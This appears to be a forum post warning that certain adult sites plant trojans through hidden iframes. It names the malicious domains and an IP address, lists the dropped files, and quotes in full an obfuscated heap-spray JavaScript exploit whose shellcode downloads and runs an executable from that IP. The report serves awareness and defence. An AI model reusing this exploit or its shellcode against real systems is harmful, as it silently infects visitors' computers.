Did you ever find the culprit?
Going through some sites and have found a few that only plant trojans randomly.
freebigxxx.com is an example that is adding iframes to noxious sites.
I found this site by a trade from teenbroadband.com
So far that site has used 2 different iframes--
Visiting these urls is not recommended if you like your computer.
src='httpXXXX//prevedtraf.biz/adv/167/new.php' width=1 height=1> which plays with these files--
sploit.anr
win32.exe
count.jar
and a few others.
src="httpXXXX//58.65.236.131/spl/index.php" width=1 height=1> This one had some obfuscated code, but seems to be gone now.
Quote:
|
<SCRIPT>var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u 4141%u4141");do{s+=s;}while(s.length<0x0900000);s+ =unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u7 68B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u382 8%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7% u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u0 38B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3 A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B% u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u4 08B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u830 4%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF% u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD 0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C8 3%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52% uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u352F%u2E38%u3 536%u322E%u3633%u312E%u3133%u732F%u6C70%u662F%u6C6 9%u2E65%u6870%u0070");</SCRIPT>
|